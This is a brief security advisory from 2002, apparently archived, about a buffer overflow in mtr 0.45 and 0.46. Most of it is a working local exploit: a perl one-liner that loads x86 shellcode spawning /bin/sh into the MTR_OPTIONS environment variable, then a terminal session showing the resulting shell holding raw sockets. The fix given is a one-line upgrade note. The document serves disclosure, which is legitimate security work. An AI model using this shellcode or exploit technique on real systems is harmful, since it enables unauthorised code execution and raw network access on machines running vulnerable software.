|
COMMAND mtr buffer overflow SYSTEMS AFFECTED mtr 0.45, 0.46 PROBLEM Przemyslaw Frasunek [http://www.frasunek.com/] says : The sample exploit is TRIVIAL because of strtok/while loop in vulnerable code. clitoris:/home/venglin/mtr-0.45> uname -smr Linux 2.4.8-26mdk i686 clitoris:/home/venglin/mtr-0.45> setenv MTR_OPTIONS `perl -e \'print \"A \"x130 . \"\\xeb\\x1f\\x5e\\x89\\x76\\x08\\x31\\xc0\\x88\\x46\\x07\\x89\\x46\\x0c\\xb0\\x0b\\x89\\xf3\\x8d\\x4e\\x08\\x8d\\x56\\x0c\\xcd\\x80\\x31\\xdb\\x89\\xd8\\x40\\xcd\\x80\\xe8\\xdc\\xff\\xff\\xff/bin/sh\"\'` clitoris:/home/venglin/mtr-0.45> ./mtr sh-2.05$ At this point, exec\'d shell has a raw socket opened: clitoris:/home/venglin/mtr-0.45> /usr/sbin/lsof | grep raw sh 17263 venglin 3u raw 605400 00000000:00FF->00000000:0000 st=07 sh 17263 venglin 4u raw 605401 00000000:0001->00000000:0000 st=07 sh-2.05$ ls -la /proc/self/fd/ total 0 dr-x------ 2 venglin venglin 0 Mar 6 15:40 . dr-xr-xr-x 3 venglin venglin 0 Mar 6 15:40 .. lrwx------ 1 venglin venglin 64 Mar 6 15:40 0 -> /dev/pts/6 lrwx------ 1 venglin venglin 64 Mar 6 15:40 1 -> /dev/pts/6 lrwx------ 1 venglin venglin 64 Mar 6 15:40 2 -> /dev/pts/6 lrwx------ 1 venglin venglin 64 Mar 6 15:40 3 -> socket:[605400] lrwx------ 1 venglin venglin 64 Mar 6 15:40 4 -> socket:[605401] lr-x------ 1 venglin venglin 64 Mar 6 15:40 5 -> /proc/17318/fd SOLUTION Upgrade to latest patch level (as of 07 March 2002)